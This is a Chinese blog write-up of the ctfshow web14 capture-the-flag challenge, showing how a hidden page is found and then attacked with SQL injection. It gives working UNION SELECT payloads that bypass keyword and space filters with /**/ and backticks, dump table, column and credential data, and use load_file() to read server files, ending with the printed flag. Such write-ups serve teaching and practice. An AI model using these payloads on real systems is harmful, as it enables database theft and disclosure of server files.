ctfshow web 14 sql注入

最新推荐文章于 2024-06-06 13:36:15 发布
最新推荐文章于 2024-06-06 13:36:15 发布
阅读量412 收藏
点赞数 1
分类专栏: ctfshow web 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46412682/article/details/107380987
版权

ctfshow web 14 sql注入

开始的页面是一段代码:
在这里插入图片描述
这是get传参,/?c=1 sleep一秒后输出$url
在这里插入图片描述
/?c=2也会输出@A@,有5555 4444 333但是不可能等这么久,直接输 /?c=3,出现
@A@here_1s_your_f1ag.php@A@
在这里插入图片描述
那打开这个文件,这是一个查询的页面
在这里插入图片描述
输入1回显是admin,url中可能存在sql注入
在这里插入图片描述
按F12查看源代码过滤了/information_schema.tables|information_schema.columns|linestring| |polygon/is
在这里插入图片描述
到这里大概率就是sql注入
爆库
在这里插入图片描述
这里差不了,我们把空格替换为/**/,数据库为web
在这里插入图片描述
爆表,这里information_schema.tables|information_schema有过滤,用tab键上的点绕过,?query=-1/**/union/**/select/**/group_concat(table_name)/**/from/**/information_schema.`tables`/**/where/**/table_schema=database()
在这里插入图片描述
爆字段?query=-1/**/union/**/select/**/group_concat(column_name)/**/from/**/information_schema.`columns`/**/where/**/table_name="content"
在这里插入图片描述
爆值?query=-1/**/union/**/select/**/concat_ws(id,username,password)/**/from/**/content/**/where/**/id=1,很伤心,搞这么久还是没有flag
在这里插入图片描述之前查询时1时弹框admin,查询2时是gtd1y,现在我们把id改为2
在这里插入图片描述
id=3
在这里插入图片描述
这里说secret,我就想到一开始页面的代码,有一个include(secret.php)
?query=-1/**/union/**/select/**/load_file("/var/www/html/secret.php")没反应,我们按下F12查看
在这里插入图片描述
现在查看/real_flag_is_here
?query=-1/**/union/**/select/**/load_file("/real_flag_is_here")
在这里插入图片描述
flag{771ad34d-bc93-4f7f-8e53-acea29b2228f}

总结:
过滤了空格用/**/代替,把tables和columns用tab键上的点括起来
load_file函数读取文件内容

0d@y
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
information_schema过滤与无列名注入
snowlyzz的博客
09-06 1268
information_schema过滤与无列名注入
ctfshow web233 sql注入
AleisurE的博客
08-09 180
写在前面:这道题当时做的时候有点懵,大师傅们的wp对这道题也写得比较简单,题其实本身比较简单,就是要跳出前两道的影响,这道题就是一道普通的延时注入。 首先这道题目和231在题面上是一摸一样的。 当时做的时候一直想着要闭合password,一直报错查询失败卡了好久,猜测应该是在password把单引号过滤了,但是username处可以加单引号闭合,那就直接闭合后面跟上延时就行了(因为没有回显了) 看师傅们的wp时,师傅们强调要注意sleep延时时要注意行数。 这里自己试的结果如下 这里应该有or的一个性质
WEB—无列名注入与过滤information_schema
sGanYu
11-09 2714
一开始由于注册admin的时候,告知用户已被注册,以为需要爆破admin密码,失败后尝试万能密码,发现也不行。。。注册新用户后又对广告的xss研究半天,虽然怀疑过SQL,后来没想到真的是SQL注入 知识点 无列名注入 过滤information_schema 随便注册一个账户登录,进去后可以发布广告【千万不要写入一个xss,弹来弹去,盲猜你们会尝试】 发布一个广告名为:1',内容随意 点击广告详情,弹出关键报错信息,数据库为MariaDB 继续注入,发布一个广告名为:.
ctfshow web web签到--web14
最新发布
2301_81040377的博客
06-06 509
要让回显有用的东西我们不可能回显几万,靶机都没了,所有挨着试。我想手注的,但是不知道为什么没有回显了只能sqlmap了。本来是想直接命令执行的,发现过滤了就用这个来看目录。SQL注入,我之前是没遇到这种格式的长了新姿势。php伪协议,不知道flag文件所以不能用。可以手注空格绕过,但是我的还是没有回显。显然我们不能用正常的SQL注入了。v1必须为字母v2必须为数字。查看源码原来我们的木马太长了。那么我们就需要用特殊的密码。刚好闭合,管理员身份就过了。我们并不知道密码,这里用。访问F12获得查询语句。
[SWPU2019]Web1 sql注入过滤了information 无列名查询
m0_64180167的博客
09-19 381
记录一道过滤 or 导致无法使用 information_schema.tables的题目。
CTFSHOW WEB入门——sql注入
Chur的博客
07-22 4126
ctfshow 靶场 web入门 sql注入系列
ctfshow---sql注入(171-213)
fainpo的博客
05-01 706
这里提一句,为什么不直接替换成acb这种,因为,flag原本就有字母,还原的时候会全部都还原成数字的,数字替换成符号应该也是可以的,这边测试了下除了&#好像别的符号都可以。插入查询后查询语句就会变成这样,由于id=11111这是一个不存在的id,而后面1=1又为真,所以会查询到表内所有的内容,--+是注释后面的字符。因为接受username的时候没有用引号,所以接受单纯的数字,而数字和字符比较会转换类型,字符串会变成数字0进行比较,所以相等。
ctfshow web入门 web14
weixin_59560134的博客
05-11 893
根据题目提示查看源代码,发现编辑器路径 在url中输入/editor得到 点击文件上传发现文件空间可能有内容 /editor/attached/file/var/www/html/nothinghere/fl000g.txt 访问 /fl000g.txt拿到flag ctfshow{8be17f6c-7a13-419b-ada0-f5f1549b3ede} ...
Web安全SQL注入攻击
03-04
①这个晨讲我构思了两个星期,但是之前电脑坏了,一直拖...今天由我给大家带来《web安全SQL注入篇》系列晨讲,首先对课程进行简单介绍,SQL注入篇一共分为三讲:第一讲:“纸上谈兵:我们需要在本地架设注入环境,构
sql注入讲解ppt.pptx
08-10
SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库...
CTFSHOW-sql注入
Yb_140的博客
08-13 2449
web171 最简单的sql注入,先演示基本操作 payload: -1' union select 1,2,database() --+ //得到数据库名为ctfshow_web -1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web' --+ //得到数据表名为ctfshow_user -1' union select
ctf.show_web(1-14)wp
qq_73767109的博客
03-28 528
ctf.show_web(1-14) 详细解题思路及部分脚本
ctfshow web入门 sql注入
weixin_74427106的博客
02-10 2520
sql注入分为多种类型的注入,我将对ctfshow web入门的sql入门进行题目分类,并在最后对每种sql注入做一下总结;
ctfshow-sql注入
m0_72898152的博客
03-07 816
ctf,sql注入
ctfshow-WEB-web14( 利用数据库读写功能读取网站敏感文件)
热门推荐
wangyuxiang946的博客
09-07 1万+
ctf.show WEB模块第14关是一个SQL注入漏洞, 绕过switch循环后可以拿到一个登录界面, 登录界面存在SQL注入, 脱库以后会提示flag在另一个文件中, 利用数据库的文件读写功能读取文件内容即可拿到flag 开局是一个switch循环, 需要传递参数 c, 参数对应的执行结果有四种: '$url', '@A@', $url, "$url" ; 前两个是字符串, 没啥用, 作者的目的应该是想让我们输出后两个 $url 的其中一个, 但输出之前还有个sleep(), 选的不合适..
ctfshow---sql注入(214-253)
fainpo的博客
05-15 2979
时间盲注了打开页面什么都没有,抓包也什么都没有,抓一下这个原始页面的包可以看到里面有参数将debug修改成1后可以看到有返回的内容既然说是时间盲注那么直接将ip修改成sleep(3) 成功延时三秒后显示内容。
CTFshow-WEB入门-SQL注入(下)
feng的博客
02-11 2031
web227 按照上一题的方法,发现查不出flag表了,把ctfshow_user表给爆了一下也没flag,然后写一句话马,蚁剑连上去还是找不到flag,人傻了。。。 看了一下y4师傅的WP,原来这题考的是存储过程: 存储过程(Stored Procedure)是一种在数据库中存储复杂程序,以便外部程序调用的一种数据库对象。 存储过程是为了完成特定功能的SQL语句集,经编译创建并保存在数据库中,用户可通过指定存储过程的名字并给定参数(需要时)来调用执行。 存储过程思想上很简单,就是数据库 SQL 语言层面
CTF show WEB14
羽的博客
02-18 2770
题目地址:https://ctf.show 对于这个题第一个坑要过的话必须得了解php的switch case语句。 在这里举个例子: $number=1; switch ($number) { case "1": echo "one"; case "2": echo "two"; case "3" echo "three"...
ctfshow sql
qq_62558184的博客
07-30 218
1、select ord('我');得到的是ASCII值2、是一个正则表达式模式,用于匹配任何 ASCII 字符。[]\x00-\x7f\x00\x7f因此,这个正则表达式模式可以匹配任何 ASCII 字符。在这段代码中,使用这个正则表达式模式进行匹配,判断$ret变量中的 JSON 字符串是否包含了任何 ASCII 字符。3、union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'啥意思?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值